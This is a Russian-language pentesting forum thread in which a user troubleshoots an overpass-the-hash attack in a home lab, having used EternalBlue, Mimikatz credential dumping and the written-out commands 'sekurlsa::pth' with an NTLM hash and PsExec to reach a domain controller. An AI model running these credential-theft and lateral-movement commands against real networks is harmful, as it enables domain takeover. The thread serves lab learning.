Privilege escalation Overpass-the-hash

Discussion in 'Этичный хакинг или пентестинг' started by Dimka55, 18 Mar 2019.

  1. Dimka55

    Dimka55 New Member

    Joined:
    27 Oct 2011
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Друзья, всем доброго дня. Развернул на виртуалках контроллер домена и пользовательскую машину. Пользовательскую тачку пробиваю Eternalblue_doublepulsar, заливаю туда Mimikatz, получаю хеш пароля Администратора домена. Надо провести атаку "Privilege escalation Overpass-the-hash".

    Выполняю команду "sekurlsa::рth /user:Administrator /domain:TEST /ntlm:fc525c9683e8fe067095ba2ddc971889"
    В результате на тачке запукается cmd.exe с правами "nt authority\system".
    Далее командой "PsExec \\192.168.43.100" cmd.exe" пытаюсь подключиться к контроллеру домена, но не выходит.
    У кого есть опыт проведения атаки, поделитесь пожалуйста.
     
  2. BillyBons

    BillyBons Active Member

    Joined:
    1 Dec 2016
    Messages:
    220
    Likes Received:
    117
    Reputations:
    13
    Откуда ? Он на ней (тачке) залогинен ?

    А должно бы с правами администратора домена.

    P.S.
    Посмотрите еще здесь.
     
    Dimka55 likes this.
  3. Dimka55

    Dimka55 New Member

    Joined:
    27 Oct 2011
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Ага, залогинен.

    По идее да.

    Спасибо, сейчас гляну. Матчасть учить надо=))
     
  4. BillyBons

    BillyBons Active Member

    Joined:
    1 Dec 2016
    Messages:
    220
    Likes Received:
    117
    Reputations:
    13
    По общепринятому алгоритму Вы правильно действуете, думаю, просто где-то путаница с учетками.

    Я бы еще фактические привилегии посмотрел -

    Code:
    whoami /priv
     
  5. Dimka55

    Dimka55 New Member

    Joined:
    27 Oct 2011
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Вот что получется.

    C:\Windows\system32>whoami /priv
    whoami /priv

    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name Description State
    ============================= ========================================= ========
    SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
    SeTcbPrivilege Act as part of the operating system Enabled
    SeAuditPrivilege Generate security audits Enabled
    SeChangeNotifyPrivilege Bypass traverse checking Enabled
    SeImpersonatePrivilege Impersonate a client after authentication Enabled
     
  6. BillyBons

    BillyBons Active Member

    Joined:
    1 Dec 2016
    Messages:
    220
    Likes Received:
    117
    Reputations:
    13
    Поробуйте через pth-winexe (с 6:00), но меня терзают смутные сомнения насчет nt authority\system)



    P.S.:
    Пароль-то Вы знаете, да ? ;-)

    Passw0rd!
     
    Dimka55 likes this.
  7. Dimka55

    Dimka55 New Member

    Joined:
    27 Oct 2011
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Пароль админа контроллера домена? Конечно знаю=)
     
  8. SterhTG

    SterhTG Elder - Старейшина

    Joined:
    14 Apr 2008
    Messages:
    87
    Likes Received:
    11
    Reputations:
    0
    Если администратор залогонен на машину, Вы должны получить дамп при помощщи mimicatz.
    У вас запустилась консоль с правами системы, не то что вы ожидали.